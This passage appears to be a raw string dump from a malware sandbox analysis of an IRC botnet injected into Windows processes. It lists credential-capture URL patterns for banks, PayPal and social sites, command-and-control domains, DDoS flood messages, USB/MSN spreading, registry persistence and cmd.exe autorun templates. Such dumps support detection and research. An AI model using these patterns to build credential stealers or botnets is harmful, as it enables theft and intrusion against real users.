loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><b>svchost.exe_884_rwx_00A10000_00029000:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>*windows defender*</pre><pre>*windowsupdate*</pre><pre>*drweb*</pre><pre>dwwin.exe</pre><pre>kernel32.dll</pre><pre>iphlpapi.dll</pre><pre>GetExtendedTcpTable</pre><pre>GetOwnerModuleFromTcpEntry</pre><pre>%systemroot%</pre><pre>%programfiles%\Common Files\*\*.exe</pre><pre>%appdata%\Identities\*.exe</pre><pre>%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe</pre><pre>ole32.dll</pre><pre>/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"</pre><pre>/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"</pre><pre>%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe</pre><pre>%SystemRoot%\system32\SHELL32.dll</pre><pre>%s\c731200</pre><pre>%s\%s</pre><pre>%s\%s.lnk</pre><pre>Windows_Shared_Mutex_231_c000100</pre><pre>ntdll.dll</pre><pre>\ScreenSaverPro.scr</pre><pre>\temp.bin</pre><pre>user32.dll</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>urlmon.dll</pre><pre>wininet.dll</pre><pre>gdi32.dll</pre><pre>rpcrt4.dll</pre><pre>netapi32.dll</pre><pre>*.exe</pre><pre>.gonewiththewings</pre><pre>*.gonewiththewings</pre><pre>WinExec</pre><pre>URLDownloadToFileA</pre><pre>http://www.google.com</pre><pre>\calc.exe</pre><pre>\Reader_sl.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>notepad.exe</pre><pre>\notepad.exe</pre><pre>\svchost.exe</pre><pre>WindowsId</pre><pre>Identities\%s</pre><pre>%s\%s\%s.exe</pre><pre>:Zone.Identifier</pre><pre>.quarantined</pre><pre>"%s" -shell</pre><pre>"%s" -bind</pre><pre>userinit.exe</pre><pre>explorer.exe</pre><pre>Windows critical error, require reboot</pre><pre>Windows Update</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>GetProcessHeap</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegOpenKeyA</pre><pre>RegEnumKeyA</pre><pre>RegCreateKeyExA</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteExW</pre><pre>SHELL32.dll</pre><pre>SetTcpEntry</pre><pre>SHLWAPI.dll</pre><pre>RPCRT4.dll</pre><pre>NETAPI32.dll</pre><pre>DNSAPI.dll</pre><pre>Software\Microsoft\Windows NT\CurrentVersion\Winlogon</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>Software\WindowsId Manager Reader</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>WindowsMark</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>%System%\notepad.exe</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0A</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>URLDownloadToFileW</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>RegNotifyChangeKeyValue</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>{A5DCBF10-6530-11D2-901F-00C04FB951ED}</pre><pre>shlwapi.dll</pre><pre>crypt32.dll</pre><pre>wtsapi32.dll</pre><pre>samcli.dll</pre><pre>netutils.dll</pre><pre>userenv.dll</pre><pre>WindowsSecondaryDesktop</pre><pre>\charmap.exe</pre><pre>\Windows Media Player\wmprph.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>Aadvapi32.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><b>calc.exe_1160:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>SHELL32.dll</pre><pre>msvcrt.dll</pre><pre>ADVAPI32.dll</pre><pre>KERNEL32.dll</pre><pre>GDI32.dll</pre><pre>USER32.dll</pre><pre>hhctrl.ocx</pre><pre>CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32</pre><pre>calc.pdb</pre><pre>j.OXO</pre><pre>_acmdln</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExA</pre><pre>name="Microsoft.Windows.Shell.calc"</pre><pre>version="5.1.0.0"</pre><pre><description>Windows Shell</description></pre><pre>name="Microsoft.Windows.Common-Controls"</pre><pre>version="6.0.0.0"</pre><pre>publicKeyToken="6595b64144ccf1df"</pre><pre>CalcMsgPumpWnd</pre><pre>The requested operation may take a very long time to complete.</pre><pre>Do you want to let the calculation continue, or stop the operation now?</pre><pre>Windows Calculator application file</pre><pre>5.1.2600.0 (xpclient.010817-1148)</pre><pre>CALC.EXE</pre><pre>Windows</pre><pre>Operating System</pre><pre>5.1.2600.0</pre><pre>Operation was canceled.-Calc does not have enough memory to continue.eThe requested function may take a very long time to complete.</pre><pre>Do you want to abort the operation now?</pre><pre>calc.hlp</pre><pre>Cannot open Clipboard.TThere is not enough memory for data.</pre><pre>calc.chm</pre><b>calc.exe_1160_rwx_000A0000_00002000:</b><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\</pre><pre>458757875</pre><pre>a1ox0.exe</pre><pre>wjjza.exe</pre><pre>tj07a.exe</pre><pre>wd6ql.exe</pre><pre>6tr3f.exe</pre><pre>uc4de.exe</pre><pre>uzue6.exe</pre><pre>tzm0b.exe</pre><pre>xkp0h.exe</pre><pre>m5h8j.exe</pre><pre>sbt6e.exe</pre><pre>1sq28.exe</pre><pre>pla6o.exe</pre><pre>26y6n.exe</pre><pre>z6dea.exe</pre><pre>2ld02.exe</pre><pre>m55uw.exe</pre><pre>5x8mu.exe</pre><pre>640ha.exe</pre><pre>user32.dll</pre><pre>urlmon.dll</pre><pre>URLDownloadToFileA</pre><pre>wininet.dll</pre><pre>http://www.google.com</pre><b>notepad.exe_1520:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>comdlg32.dll</pre><pre>SHELL32.dll</pre><pre>WINSPOOL.DRV</pre><pre>COMCTL32.dll</pre><pre>msvcrt.dll</pre><pre>ADVAPI32.dll</pre><pre>KERNEL32.dll</pre><pre>NTDLL.DLL</pre><pre>GDI32.dll</pre><pre>USER32.dll</pre><pre>notepad.chm</pre><pre>hhctrl.ocx</pre><pre>CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32</pre><pre>notepad.pdb</pre><pre>t%SSh</pre><pre>_acmdln</pre><pre>RegCloseKey</pre><pre>RegCreateKeyW</pre><pre>RegOpenKeyExA</pre><pre>SetViewportExtEx</pre><pre>GetKeyboardLayout</pre><pre>name="Microsoft.Windows.Shell.notepad"</pre><pre>version="5.1.0.0"</pre><pre><description>Windows Shell</description></pre><pre>name="Microsoft.Windows.Common-Controls"</pre><pre>version="6.0.0.0"</pre><pre>publicKeyToken="6595b64144ccf1df"</pre><pre>&*$#$$#$*</pre><pre>MMMrMMM`MMMRMMMFMMM:MMM.MMM"MMM</pre><pre>*.txt</pre><pre>/.SETUP</pre><pre>5.1.2600.5512 (xpsp.080413-2105)</pre><pre>NOTEPAD.EXE</pre><pre>Windows</pre><pre>Operating System</pre><pre>5.1.2600.5512</pre><pre>notepad.hlp</pre><pre>Text Documents (*.txt)</pre><pre>You cannot quit Windows because the Save As dialog</pre><pre>dialog box, and then try quitting Windows again.</pre><pre>Common Dialog error (0xx)</pre><pre>Not enough memory available to complete this operation. Quit one or more applications to increase available memory, and then try again.KThe %% file is too large for Notepad.</pre><pre>Not a valid file name.MCannot create the %% file.</pre><pre>Make sure that the path and filename are correct.RCannot carry out the Word Wrap command because there is too much text in the file.</pre><pre>Page %d</pre><pre>Ln %d, Col %d</pre><b>calc.exe_1160_rwx_00970000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL 